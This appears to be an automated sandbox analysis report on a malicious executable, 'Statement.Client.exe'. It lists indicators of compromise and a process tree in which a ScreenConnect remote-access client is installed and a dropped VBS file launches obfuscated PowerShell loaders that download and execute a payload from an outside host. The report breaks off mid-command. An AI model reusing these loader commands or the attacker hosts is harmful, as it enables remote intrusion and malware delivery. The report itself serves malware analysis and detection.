60408887b84fc3631301463461a1d73c0b5cc74d6d82905ddf923bdbab027a311cc38d3fa16f639a50203010001a382020630820202301f0603551d230418301680146837e0ebb63bf85f1186fbfe617b088865f44e42301d0603551d0e04160414338ce10a6e06d9c6ed0bc6cae736cefb8188646a300e0603551d0f0101ff04040302078030130603551d25040c300a06082b060105050703033081b50603551d1f0481ad3081aa3053a051a04f864d687474703a2f2f63726c332e64696769636572742e636f6d2f4469676943657274547275737465644734436f64655369676e696e6752534134303936534841333834323032314341312e63726c3053a051a04f864d687474703a2f2f63726c342e64696769636572742e636f6d2f4469676943657274547275737465644734436f64655369676e696e6752534134303936534841333834323032314341312e63726c303e0603551d20043730353033060667810c0104013029302706082b06010505070201161b687474703a2f2f7777772e64696769636572742e636f6d2f43505330819406082b06010505070101048187308184302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d305c06082b060105050730028650687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274547275737465644734436f64655369676e696e6752534134303936534841333834323032314341312e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820201000ad79f00cf4984864c8981ecce8718aa875647f6a74608c968e16568c7aa9d711ed7341676038067f01330c91621b27a2a8894c4108c268162a31f13f9757a7d6bb3c6f19bf27c3a29896d712d85873627d827cd6471761444fabf1d31e903f791143c5b4ce5e7444aacba36d759aeba3069d195226755cbc675aa747f77596c53c96e083c45bba24479d6845eea9f2b28ba29b4dcf0bcf14aa4ce176c24e2c1b8fec3ee16e1c086db6fda97388859e83be65c03f701395b78b842c6dd1533ef642cca6fe50f6337d3f2dfedd8b28f2b28e0c98edd2151392e7cc75489f48859f1de14c81b306eb50eed7bb78be30eaada76767c4ca523a11eec5a2372d6122926ab1801a6a6778e9504791487ee47d4577154988802070f80fc535957658f954cd083546c5afb5a6567b6761275f5db20f70ab86feef94c7cfc65369d325121b69a82399bc7dc1962416f0f05cf1eee64d495a3527e464e2c68da0187093f97b673e43dddbcc067e00713f1565fcff8c3772d44b40a04e600644f22a990345f9a6b5b52963e82c81a0ce91d43a230f67b37d8debda40ea3d59d305e18adc1976516c12a8ba2bca24143b12e9527b4dca58872aa9b3a8c6ac563fc2dc02bf51be889516d35a4ba9d062417b5bdcc50ba945fae26b60d6aec03984798a6a21d3ff793cc0849e81ed55b8027411c50db776ae8feef2fdc2dafb04345261dedc054	Statement.Client.exe

Suspicious behavior: EnumeratesProcesses 20 IoCs

pid	Process
512	ScreenConnect.ClientService.exe
512	ScreenConnect.ClientService.exe
512	ScreenConnect.ClientService.exe
512	ScreenConnect.ClientService.exe
512	ScreenConnect.ClientService.exe
512	ScreenConnect.ClientService.exe
1660	powershell.exe
1660	powershell.exe
4364	powershell.exe
4364	powershell.exe
2704	powershell.exe
2704	powershell.exe
2704	powershell.exe
1984	powershell.exe
1984	powershell.exe
1984	powershell.exe
4364	powershell.exe
4364	powershell.exe
1984	powershell.exe
3712	msiexec.exe

Suspicious behavior: MapViewOfSection 2 IoCs

pid	Process
4364	powershell.exe
1984	powershell.exe

Suspicious use of AdjustPrivilegeToken 8 IoCs

description	pid	Process
Token: SeDebugPrivilege	3288	dfsvc.exe
Token: SeDebugPrivilege	512	ScreenConnect.ClientService.exe
Token: SeDebugPrivilege	1660	powershell.exe
Token: SeDebugPrivilege	704	ScreenConnect.WindowsClient.exe
Token: SeDebugPrivilege	4364	powershell.exe
Token: SeDebugPrivilege	2704	powershell.exe
Token: SeDebugPrivilege	1984	powershell.exe
Token: SeDebugPrivilege	3712	msiexec.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
704	ScreenConnect.WindowsClient.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3712	msiexec.exe

Suspicious use of WriteProcessMemory 51 IoCs

description	pid	Process	procid_target
PID 3320 wrote to memory of 3288	3320	Statement.Client.exe	84
PID 3320 wrote to memory of 3288	3320	Statement.Client.exe	84
PID 3288 wrote to memory of 3356	3288	dfsvc.exe	86
PID 3288 wrote to memory of 3356	3288	dfsvc.exe	86
PID 3288 wrote to memory of 3356	3288	dfsvc.exe	86
PID 3356 wrote to memory of 4232	3356	ScreenConnect.WindowsClient.exe	87
PID 3356 wrote to memory of 4232	3356	ScreenConnect.WindowsClient.exe	87
PID 3356 wrote to memory of 4232	3356	ScreenConnect.WindowsClient.exe	87
PID 512 wrote to memory of 704	512	ScreenConnect.ClientService.exe	89
PID 512 wrote to memory of 704	512	ScreenConnect.ClientService.exe	89
PID 512 wrote to memory of 704	512	ScreenConnect.ClientService.exe	89
PID 512 wrote to memory of 756	512	ScreenConnect.ClientService.exe	92
PID 512 wrote to memory of 756	512	ScreenConnect.ClientService.exe	92
PID 512 wrote to memory of 756	512	ScreenConnect.ClientService.exe	92
PID 512 wrote to memory of 1608	512	ScreenConnect.ClientService.exe	94
PID 512 wrote to memory of 1608	512	ScreenConnect.ClientService.exe	94
PID 1608 wrote to memory of 1660	1608	cmd.exe	95
PID 1608 wrote to memory of 1660	1608	cmd.exe	95
PID 704 wrote to memory of 796	704	ScreenConnect.WindowsClient.exe	99
PID 704 wrote to memory of 796	704	ScreenConnect.WindowsClient.exe	99
PID 704 wrote to memory of 796	704	ScreenConnect.WindowsClient.exe	99
PID 796 wrote to memory of 3208	796	ScreenConnect.WindowsClient.exe	100
PID 796 wrote to memory of 3208	796	ScreenConnect.WindowsClient.exe	100
PID 3208 wrote to memory of 2704	3208	WScript.exe	116
PID 3208 wrote to memory of 2704	3208	WScript.exe	116
PID 4364 wrote to memory of 3712	4364	powershell.exe	123
PID 4364 wrote to memory of 3712	4364	powershell.exe	123
PID 4364 wrote to memory of 3712	4364	powershell.exe	123
PID 4364 wrote to memory of 3712	4364	powershell.exe	123
PID 3712 wrote to memory of 4868	3712	msiexec.exe	124
PID 3712 wrote to memory of 4868	3712	msiexec.exe	124
PID 3712 wrote to memory of 4868	3712	msiexec.exe	124
PID 3712 wrote to memory of 4224	3712	msiexec.exe	126
PID 3712 wrote to memory of 4224	3712	msiexec.exe	126
PID 3712 wrote to memory of 4224	3712	msiexec.exe	126
PID 4224 wrote to memory of 3308	4224	cmd.exe	129
PID 4224 wrote to memory of 3308	4224	cmd.exe	129
PID 4224 wrote to memory of 3308	4224	cmd.exe	129
PID 1984 wrote to memory of 4700	1984	powershell.exe	130
PID 1984 wrote to memory of 4700	1984	powershell.exe	130
PID 1984 wrote to memory of 4700	1984	powershell.exe	130
PID 1984 wrote to memory of 4700	1984	powershell.exe	130
PID 4700 wrote to memory of 4924	4700	msiexec.exe	136
PID 4700 wrote to memory of 4924	4700	msiexec.exe	136
PID 4700 wrote to memory of 4924	4700	msiexec.exe	136
PID 4700 wrote to memory of 3104	4700	msiexec.exe	137
PID 4700 wrote to memory of 3104	4700	msiexec.exe	137
PID 4700 wrote to memory of 3104	4700	msiexec.exe	137
PID 3104 wrote to memory of 1604	3104	cmd.exe	140
PID 3104 wrote to memory of 1604	3104	cmd.exe	140
PID 3104 wrote to memory of 1604	3104	cmd.exe	140

C:\Users\Admin\AppData\Local\Temp\Statement.Client.exe
"C:\Users\Admin\AppData\Local\Temp\Statement.Client.exe"
1⤵
- Manipulates Digital Signatures
- System Location Discovery: System Language Discovery
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:3320
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
  2⤵
  - Modifies registry class
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3288
- - C:\Users\Admin\AppData\Local\Apps\2.0\0LRQ0ZTX.127\RRHZ5GDM.MZD\scre..tion_25b0fbb6ef7eb094_0018.0003_8fd1907d7cbc658e\ScreenConnect.WindowsClient.exe
    "C:\Users\Admin\AppData\Local\Apps\2.0\0LRQ0ZTX.127\RRHZ5GDM.MZD\scre..tion_25b0fbb6ef7eb094_0018.0003_8fd1907d7cbc658e\ScreenConnect.WindowsClient.exe"
    3⤵
    - Executes dropped EXE
    - Modifies registry class
    - Suspicious use of WriteProcessMemory
    PID:3356
  - - C:\Users\Admin\AppData\Local\Apps\2.0\0LRQ0ZTX.127\RRHZ5GDM.MZD\scre..tion_25b0fbb6ef7eb094_0018.0003_8fd1907d7cbc658e\ScreenConnect.ClientService.exe
      "C:\Users\Admin\AppData\Local\Apps\2.0\0LRQ0ZTX.127\RRHZ5GDM.MZD\scre..tion_25b0fbb6ef7eb094_0018.0003_8fd1907d7cbc658e\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=api.wisescreen.net&p=8041&s=242614d5-9b0d-42a9-99bd-6fcc80ac8cc3&k=BgIAAACkAABSU0ExAAgAAAEAAQDtQ8jiTjVfazPJSqJ2XEoaqaKFOzZ605yz6hYIv8M7oOnlwfDWfe3v2tUdEO1xGqJdiUZvf4Job0h77N%2f3xyDpec8%2bIXvZFdeEQv6ZmkteD4w4V7CairB78fNaNnQHdATNnOcWXVaX3zjxYIj2eh8cKVFr9wwIps1VKpOM9JTq4tPgXX%2fag0amDzTC1v7aH7ztAJoBRneVdo1mSJod7oL713MYSJAC5clrYHPeJUoCgAhv9UuNovpvt51NjB5FuZvgWP32mCuwprJpolaxfRuswOm879CoUpHd68BExmxShqAn9sLdLjj53kqwsixMTr1whX2%2b2GHRj3Qgw9exO8O8&r=&i=Untitled%20Session" "1"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      PID:4232
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 3320 -s 308
  2⤵
  - Program crash
  PID:2168

C:\Users\Admin\AppData\Local\Apps\2.0\0LRQ0ZTX.127\RRHZ5GDM.MZD\scre..tion_25b0fbb6ef7eb094_0018.0003_8fd1907d7cbc658e\ScreenConnect.ClientService.exe
"C:\Users\Admin\AppData\Local\Apps\2.0\0LRQ0ZTX.127\RRHZ5GDM.MZD\scre..tion_25b0fbb6ef7eb094_0018.0003_8fd1907d7cbc658e\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=api.wisescreen.net&p=8041&s=242614d5-9b0d-42a9-99bd-6fcc80ac8cc3&k=BgIAAACkAABSU0ExAAgAAAEAAQDtQ8jiTjVfazPJSqJ2XEoaqaKFOzZ605yz6hYIv8M7oOnlwfDWfe3v2tUdEO1xGqJdiUZvf4Job0h77N%2f3xyDpec8%2bIXvZFdeEQv6ZmkteD4w4V7CairB78fNaNnQHdATNnOcWXVaX3zjxYIj2eh8cKVFr9wwIps1VKpOM9JTq4tPgXX%2fag0amDzTC1v7aH7ztAJoBRneVdo1mSJod7oL713MYSJAC5clrYHPeJUoCgAhv9UuNovpvt51NjB5FuZvgWP32mCuwprJpolaxfRuswOm879CoUpHd68BExmxShqAn9sLdLjj53kqwsixMTr1whX2%2b2GHRj3Qgw9exO8O8&r=&i=Untitled%20Session" "1"
1⤵
- Sets service image path in registry
- Drops file in Windows directory
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:512
- C:\Users\Admin\AppData\Local\Apps\2.0\0LRQ0ZTX.127\RRHZ5GDM.MZD\scre..tion_25b0fbb6ef7eb094_0018.0003_8fd1907d7cbc658e\ScreenConnect.WindowsClient.exe
  "C:\Users\Admin\AppData\Local\Apps\2.0\0LRQ0ZTX.127\RRHZ5GDM.MZD\scre..tion_25b0fbb6ef7eb094_0018.0003_8fd1907d7cbc658e\ScreenConnect.WindowsClient.exe" "RunRole" "7d97551f-5fd1-435c-b5d6-4a43e6e2311c" "User"
  2⤵
  - Checks computer location settings
  - Drops file in System32 directory
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of WriteProcessMemory
  PID:704
- - C:\Users\Admin\AppData\Local\Apps\2.0\0LRQ0ZTX.127\RRHZ5GDM.MZD\scre..tion_25b0fbb6ef7eb094_0018.0003_8fd1907d7cbc658e\ScreenConnect.WindowsClient.exe
    "C:\Users\Admin\AppData\Local\Apps\2.0\0LRQ0ZTX.127\RRHZ5GDM.MZD\scre..tion_25b0fbb6ef7eb094_0018.0003_8fd1907d7cbc658e\ScreenConnect.WindowsClient.exe" "RunFile" "C:\Users\Admin\Documents\ConnectWiseControl\Temp\Caproyl.vbs"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Modifies registry class
    - Suspicious use of WriteProcessMemory
    PID:796
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Documents\ConnectWiseControl\Temp\Caproyl.vbs"
      4⤵
      Checks computer location settings
      Suspicious use of WriteProcessMemory
      PID:3208
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Sulciform Sheephead Datovekslen Aliped #><#Unfulfilled Tibbu Domptr Aftereye Blizz #>$Hydropolyp='Stempellovenes';function Matranee($Pseudocyclosis){If ($host.DebuggerEnabled) {$Mineraloliernes=4} for ($Phenanthrene=$Mineraloliernes;;$Phenanthrene+=5){if(!$Pseudocyclosis[$Phenanthrene]) { break }$Quods+=$Pseudocyclosis[$Phenanthrene]}$Quods}function Oratoriske($jennifers){ .($Fugtigvarmes) ($jennifers)}$Sortermulighedens=Matranee 'PerinMisfE pliTSt.l.overWFotoeordsBVe,ec.esoLVirkiThisEOutbnHomoT';$Svinget=Matranee 'StedM.agroK ntzSpooiZayil TollButta.ata/';$Propupa=Matranee 'NotaTSt fl FinsAfst1Spad2';$Reactivations220='suit[F.ydnPen,e FoltNor,. FilSFlagEPotsrBevgVEs.diRetrc SleE RespSchoORatii G.on SkitTikmMPizeaNonpNSupea hrgBlueeUndeRdann]pseu:Tran:negeSVaa ePhrec De UForsrShipiVietT Te yTraspMaanR Pr,oPinuT.ondO .ulCEnkeOElveLTown=H rs$HoroP .orRP,ckOVidrPAnglUF.rrp artA';$Svinget+=Matranee 'Mea 5Adha.Gen.0 el Livs(NairWForpiJenhnUn ad VisoEstrwSupesArti Fe eNRampTGrie Disc1Udsl0Dksk.Jo f0Fixe; Rea DueW.egliHindnAfsk6 Vis4Brmm; S n D.ax Ls,6Best4U ex; Gyn MigrrAfdav Byb:Om a1Soci3Part1Opiu.Ma a0Dag )Rhap L ngGfineeSkolc ailkHexaoCo,d/Tena2 llo0Skov1Shak0Pi,c0S up1Inci0Kons1 rse JvniF Snai inarSquie potfOutdoBofoxF du/Slyn1.isc3Au t1 Sel.Udda0';$vedhnget=Matranee ' MilUe poSr,maEMundRMor.- E sABr pGEtr,e Paan HalT';$Yephede=Matranee 'Rillhfilot psptrefepForss St,:mili/Bioc/ brnfM toi anolOrgaePhotdAfsln Sem. SkaeWontuPerg/ istlAutomStorjInt,MMimb1PuppIIl.otC dbiPlusFDirtCPaavHkarrjWitcYFo,fAIns 4Ac iJFoneNInapRO erBAbutYAperBReit3Fleh4kbst/Fagov,undiDefieUncot PrenStana Se mmisv.Galat Milt Kphf';$Kapitulant=Matranee 'Cusc>';$Fugtigvarmes=Matranee 'F,lmiPeixESuk x';$Demotes='Duperede';$Natvgterstat='\Landbrugslovenes201.spr';Oratoriske (Matranee 'Caus$ TragAldeLSys oAsseblyseaYderLDele: ParFRyaeo,eksRw rcl K lyOraiS.otoTBe ye lanl igasS.igE K nsOve SVindy FloGFernt ,je= Ben$MaitE S.rnTic vNett: ahaForbpK biPTrskDPe,fAEl qtFe tASile+Bi.e$Kli N Plea FlotNonrvEulaGCrimt An EKak,rSvarsTragtSat.ANuclT');Oratoriske (Matranee 'Land$TrusGUdl.lAktiO goab StaA ftelPhot:KkkegSeedUForlMLubrmSor I SubH HonJ mi.uBerulWhipE U st SdeSInfe=El,k$S.miYAchrEDidePkabiHDdsdE Co.dReane hav.kuliSB.odP AstLu.deI .ontPri,(Magt$,ociKenqua eplP AffIImpuTscisu Su.lCon ABla NO tiTErst)');Oratoriske (Matranee $Reactivations220);$Yephede=$Gummihjulets[0];$Prepender=(Matranee 'F,st$CeleGKlevLNat,oFng B,ntiAHec.LD ce:PseufGnosiBrugn KriiC traEftelUnde=gr.pNRus,e forWGrov- AfkO ElaBTareJSlineVirkcBerrtCons PentsenclYEmicsCowltMaroEMassmDyst.Bede$EncuSInkaolactrConctUdtrE Ap rBagsMIncoU F.rL kooIFamiGSvunhB tie Ud DEnameBag nfo kS');Oratoriske ($Prepender);Oratoriske (Matranee ' Fre$Ska,FVenti ygnnDom,i Mugahyl.l O e. UndH atheAfruaS mfd De eAfslrBrudsdiso[Cre $skrdvServeblo dKapehInt nSubcgFrade EpitWere] Ker=Stib$ fsvSSkolvBe eiQuidnA prgGeneeSl,tt');$Downsteepy=Matranee ' Pol$RecaFWar i Subnw,iniBenzaPhonlKrys. GjoD,elgoBar w,enonBr llVandoParaaC rkds rvFMakuiAngulD ese A t(Nonh$KoksY emaeFarmpOverhInfieInfldF ale.van, pec$U.dePInd.rAssaoelengOverr R naServmDomss SlayDelfs TimtAcceeDd imOutseTjrnrCrysnInsteKontsWass)';$Programsystemernes=$Forlystelsessygt;Oratoriske (Matranee ' .ru$Swi gBenaLAld.o.kieb PriaMisclRedi:DyresLikvAPhylM SigLHy oiFo uVOlavS ttef Appo ProRStadh,ondoGiggl k nDep,ie ca.NDredEAdmiSFa e=Snea(Ind TTvrmEdelpsAport bro-TriupDig A.yttT solHPlad Br,g$ArsePUpasRRe poFul GPer ROpgaABj gMtir SInt YBy,dS Tr tPredESjokm LunEOutsrHol nOptieNongsTus )');while (!$Samlivsforholdenes) {Oratoriske (Matranee 'Goth$Non.gBorglSammoFeltbCi.uaF lolChap:KommHHenryO.erpHelveKonsr C,no eksx Logy enogHjere ftenAp liUdvisBudgeFrum=Slud$NordPIronh,hrie,ectnGkkeaUndenPra,tDoorhKu irMedie Udsn mageFabunP aip P.euNo.etH sss LortBroanS kkiHjo.n B,agSkrys') ;Oratoriske $Downsteepy;Oratoriske (Matranee 'AcidSFoldtFalla NyhrIn,etRefr-HalvSReirlPs,kem trE strpKrel Rhyn4');Oratoriske (Matranee 'Basi$ EmaGVaanlReveo,xciBEvanaAbo LPai.:V ndS AbeAStteMVoldl amfIboolvSha.ST pef depop.osRPuckHSubaoPerflDuodd armEDefiN Aa,eSalgSHenr=Uni.(FeritFgteeHospSsikkt sla- holPAcriAUdbatSwi hAn,u Need$krlip si RDaglOKalfg anRBibeaCaecm GassEremy PlesPu,kT rdeECadmM ypledommRPlannRes e SkeS yth)') ;Oratoriske (Matranee ' Hyp$SkrlG Begl SkuOGranBjoula entLArka:Skuefg nkASkjorKratVK kke skrLPatrAHyd D,andehje RAsa NA.skE Und=sv m$Melog OpbLAfs.Om.taBCafaAAlmel Re :S inUAi fD FinRUdtoE CymdTorgE inLImpisS ineOri rUndenUig,EThanSFors+Eska+Pa,e%Cent$ KnuGmyloU O eM ,alMOverIConcHChi JHoldUAbr.LforsEblanTTanksFot,. SelCMultOElituAmernNonct') ;$Yephede=$Gummihjulets[$Farveladerne]}$Annekteret42=299776;$Tentorial=31265;Oratoriske (Matranee ' Pan$Ecceg Br lAnkeoanliB M lAE islGuts:StikSFardmReplaInteA pheSMul KnonrO Me,VG anePaganO,blESustSBol. Su,=Unde Vi GSku.EPlayT Unp-O,bic rroUnmenNe sT AbaeB,azNT.aaT Plo Eje $ C.mPUddaR RatoOctegBdrmRDaarAFo,smBucosFaluYFoyaSFristLdgoe HypML geEMindrDsn NEmbuE ejs');Oratoriske (Matranee ' Ove$ HjegOst lV lko DvabSelvaEjstlhet : UndMEkspaAppes .likTra i,asvn Ca,tUdsviKonddcabb Proj=Shet Mar[Sur.S LgeyPreasVirktSzl.eVandmCard.,rolCSerboTrngn Birv ate Botrrundt,ymn]In e:Pil :BidsFSkinrOpsto premibr BGu daSamasOunceCa,t6Tea 4Sku SSylltNonir ZiriTelen.ajogInda( S,u$ iriSDopimRemia.reeaBenzs Lisk UndoCostv V seSkrinOdiseSpidsi it)');Oratoriske (Matranee 'Fuks$SeptgCantlProvO anbGramARedeL ong:PhrademboI AhaA I tPHer,EL euRho eS Ind1,tal4K ea2Niff Sier=B ck Sha[ AvnsKrn yPrevSS lvTRn eERataMS,te.letuTIndkeRuskxChrotCabi.TeraE IsoNUrt,CGenboB eddDownIToriNSup gWarm]Trim: Sou:Hem aFor,sHaa cProtiUdv,i im.Str,G.lasENegrTEf,eSAv rTKalmRKongiE panPudeg Ka.(Deri$M,liM,ereABortsu fekMomsi HydnDweetWoozI erud dup)');Oratoriske (Matranee 'Moon$Indvg TorlSan oMagnbPillASveslStat:Blo.vAlcaEK lllOs uaLoxotLatheMarqDY te=Berk$ V jDOveriFor a TerpIn,eeTetrr P,lS U,b1 Reg4Unal2 Hyd.BogtSFor UPladBPeptSMasstForeRVindiIn pNQuirgAfre( Fac$Sky,AS ccNbalanTidseSp.tKApp,TContEQuinrTrykeCacotbrug4Ina.2Demi,Vehe$Tankt B,leUvitn.mboTAccooEastREupni OutAhurtLOm l)');Oratoriske $Velated;"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2704
- C:\Users\Admin\AppData\Local\Apps\2.0\0LRQ0ZTX.127\RRHZ5GDM.MZD\scre..tion_25b0fbb6ef7eb094_0018.0003_8fd1907d7cbc658e\ScreenConnect.WindowsClient.exe
  "C:\Users\Admin\AppData\Local\Apps\2.0\0LRQ0ZTX.127\RRHZ5GDM.MZD\scre..tion_25b0fbb6ef7eb094_0018.0003_8fd1907d7cbc658e\ScreenConnect.WindowsClient.exe" "RunRole" "4caf7e11-9a3b-435a-900c-87bb3cb25cf1" "System"
  2⤵
  - Drops file in System32 directory
  - Executes dropped EXE
  - Checks processor information in registry
  - Modifies data under HKEY_USERS
  PID:756
- C:\Windows\system32\cmd.exe
  "cmd.exe" /c "C:\Windows\SystemTemp\ScreenConnect\24.3.7.9067\hVqvsfdxfEibrun.cmd"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1608
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -windowstyle hidden "<#Intermorainic Karines Pitman Unpertinently #><#Timetalsnedskringernes Cogwheels nongeographic Stammendes leans #>$Loopier='Gaminesque121';function Levnedsmiddelkontrollen($Adfrdsnorms){If ($host.DebuggerEnabled) {$Oolemma=4} for ($Brnderslevbo251=$Oolemma;;$Brnderslevbo251+=5){if(!$Adfrdsnorms[$Brnderslevbo251]) { break }$Emberizinae+=$Adfrdsnorms[$Brnderslevbo251]}$Emberizinae}function Pedelion($Operationsplanernes){ .($Mirounga) ($Operationsplanernes)}$Shilingi=Levnedsmiddelkontrollen 'LammnChesE Co tSyne.ShriwSl kEKderBShogC PreLDisti B gEIn.aNAu hT';$Hemicircle140=Levnedsmiddelkontrollen ' SanM Tigo PerzUk liPolylOpsal Outa Rin/';$Umoraliteters=Levnedsmiddelkontrollen ' T aTTveslBesvsThau1So s2';$Phrenologists='Arom[ DenNburgefu iTPr.o. Un sOpaceKatarPro,vJvnaI vecR gieFestp.ilkO LeviTranNBalttLd eMRnenA A,snkadmADomsGSyncEforerFi,m]k,de: ata:IndiSUn,aE p.rcUnvauHypoR ItcIMytit PhaY,ionPFaneR roOJo dtCereoSpi,c KilOguerLGoos= Oli$fremU Ho.MEc ooKoldR PrvAHva L OpriNonctPhi,EIndeTForteWettRForfs';$Hemicircle140+=Levnedsmiddelkontrollen 'Qu e5Use,.Twad0C nu Kon(StarWWeaviOve nathadT lsoO,chw Achs Sne B,ggNUhaaTLoet Unde1Refe0Buff.Udbl0By.r;Bauf Mo Wmycti Tesn reh6 Gen4Ov.r;Zoog VexixNonp6Stri4Deca; D f Noc,rudrmvOpga:A.ns1S yl3Flac1K.nd. pil0Mor,)T es LegGU cae istc.arak.ranoSked/Gjal2 isa0Sten1Lae.0Unfr0Anst1T rk0 Sem1Vaca pshFAnaci ValrRunoeS agfLittoFolkxFors/smal1 Afl3 E.t1Fakt.Topm0';$legalisere=Levnedsmiddelkontrollen 'AadaUVul SCoc.EBor.RMalk- HklaLithGS.cueXyphnEvant';$Sandhedsserumer=Levnedsmiddelkontrollen 'SterhKonftTeglt s,vp oadsCiv : Cor/ ork/Udstf ArciHaanlCon.eVoucdVi nnZero.Sekue Fe uUnab/Syenl Gram slbjKitcMP.ro1UnhyI opit ViriHvl FFj.rCGalaHOndsjPreiYHe aA.eac4DataJAutoNI,reRNeurBFrizYBautBB st3Unid4Stat/ inddHesti Ra fTrusfBeg,e yrirArdueCrennSkams SlarSid k insk Pare UndrProk.SklmdEne.s,elep';$Fascineredes=Levnedsmiddelkontrollen ' San>';$Mirounga=Levnedsmiddelkontrollen ' AnoiBl aeA.tix';$Aspring='Imperceptibly';$Wernas='\Intimidity.Alb';Pedelion (Levnedsmiddelkontrollen '.run$gtheG PenLHan,oSmulbVersaBabalS um:SrloAPiddlBrneKLacuo MdeHs rjOHapllcaz ISkafs rteL.mir eurePer.tOmty=Agro$ Ad EHofdNAntivStrr:R gnaEk,aP aboPFi tD,uspaStruTGrova emm+ P e$adelWE.seeMinirrillNCycaAP.isS');Pedelion (Levnedsmiddelkontrollen 'Pinu$ onfGva el nto.polb.ilbaUpholChe : .ulEPrelO Un.NMet,iAf iSallaM Do S Vic=Ha e$Afbls nsha ennF.atDF mshSeclE Tridkon,SBi.oS Emme,utir vauSepaMMargEMickrBek,. UndSHegePS bhlAnstiDistTcopa(Boos$TinsF me a aglS aadcPreri BlanFellEholorPiale ArodInvaeSimpSIn,u)');Pedelion (Levnedsmiddelkontrollen $Phrenologists);$Sandhedsserumer=$Eonisms[0];$dommerkendelsernes=(Levnedsmiddelkontrollen 'Komp$DizzG,rkilcorrOTrifb obbA,elolTram:Sce ITvedtBoniE .ifrMimiaT,rpTResseE uiLMarkYOkse=AssenSwerePantWReav-GtteOBgebBTri.jConverecoc kaT Pe. Am eSPa.tyPo,ts relTSvinEne,rM Epi.Pr,o$GaliSKingH BrniLa nL PadIForpNUncegBewiI');Pedelion ($dommerkendelsernes);Pedelion (Levnedsmiddelkontrollen 'Extr$cistICl.rt .leeNut,r SynaSe ttBrone P.ml CacyChea.D ssHSprieg laasnevd Mase Char GensInad[ An $Glacl We eW odgShedaGruplGatei FfesL.vie NonrNonme Sam] De,=Unit$FemeH Tupest.imMul iHegecYuckiStoirVrdic RaalTi beUnhy1,arm4Cool0');$Seattle=Levnedsmiddelkontrollen 'Porn$airwIMetat,lageRyper DefaPenst lyseBroel LexyHur . ekDCrinoMariwGullnPaaslsacaoFeataQuizdVlt.F,etiiSp ilUnace Fem(Hu o$ narSMurmaPerpnBirgdPorchConneLi edRustsOlivs Rede Nonr ,inuLetfm ShaeIrrarform,Skik$PjevSUn et t no Blor ,oseNemesTimosUnautEnderV nteHaulnR,coe Ca,)';$Storesstrene=$Alkoholiseret;Pedelion (Levnedsmiddelkontrollen 'Bod,$ legGSubjl ,enOArkib R sAOmvelMyel:SharRSl,teSkrolCo ooKichAReguD OpeEArmaDguin2Summ5 Lig4 O r=Cons(LygtTTi,sESer,sintitPike-RevePSikkaFurrTAv.sHHove phe$For.sE,isttjenoDeporIsseE Mi SFjorSP.olTMcfaRstoreSydlNS anES ak)');while (!$Reloaded254) {Pedelion (Levnedsmiddelkontrollen 'Dram$UdbegDat,lEt.noEmanbportaUprclU.by:O erQP ogyUnth= Sys$Unt P BlolfremuSmugkFum kFutue') ;Pedelion $Seattle;Pedelion (Levnedsmiddelkontrollen 'ForkSLuksTNedgA Star AntT um-.ildsOme.L Note Intea.slp Smi Math4');Pedelion (Levnedsmiddelkontrollen 'Libi$GelagCartlUnaco ty BIsotAco eLTrea: MacRBabieJvneLNubioPolyAFcytdTilseAffldFe,t2 Fll5Kamp4Regn=Gill(He,stMandEAvlssN tctTra,-usurPCo,paRi,at Urohpirr Arb$InteSTri.T,gesOShivr R dEjerksPen.S raT S oR BeleFactNR tseBu m)') ;Pedelion (Levnedsmiddelkontrollen ' Ge $InjuGHje lBowloHuspBFlysAOutsLStiv:CyanS numiUdt LAntiIRensc ppeeMannOtrylU udtsMero=Sed,$E.udg ekelmyxoOTotab ipoa ForlOpka:SekrCSantoCry,nAfkvGGesjeStrinAsseI rema C,tlChacN.orsEBrneSNonosRach+Fibe+phot%Be,i$IllgESka.oFluin BemIUbevs UnsmAfpaSVagt. T kC inOops u AfvN UfoT') ;$Sandhedsserumer=$Eonisms[$siliceous]}$Diacetylmorphine=330880;$Termined233=29940;Pedelion (Levnedsmiddelkontrollen 'Sena$ ktig tralSalaO ondBAcidaprivlKome:VaabKAppra,pusr Camt deno dehnCrzeNStnna SmuGBommesymfrVa cNHisteS,de Gene=Spir acgRaceeOptaT O,p-SvigcSchnoMe iNTet TBedee.chnnBetrTGian B ll$Bef.s ProTRus oUd.eRHaldE.iggs Gi s indTpatrrTegnE FarNUdtre');Pedelion (Levnedsmiddelkontrollen 'Hunl$g uegSubclRomeo HelbtaktaCauslEl,c:Gu rC foraMetarUdslr eariC yoaMossg,chieSy.olLacreA sks ntrsSo a Sou =Lyse M dv[BushSDampyDarrsGlaitFolkebalsmp.st.U flCDiptoN ncn ydvInteeShanrPolyt utt]Sild:kar : Id Fse erRescoSydkmTer BRei aUnwisRampe tvl6 Ti,4AntiSHjemtl,nsrB.dei Nitn progLapi(Sgel$ParaK annaTamar KontFaaroAdumntopmnFlgeaKrafg BoreTrikr Komn .rieHatp)');Pedelion 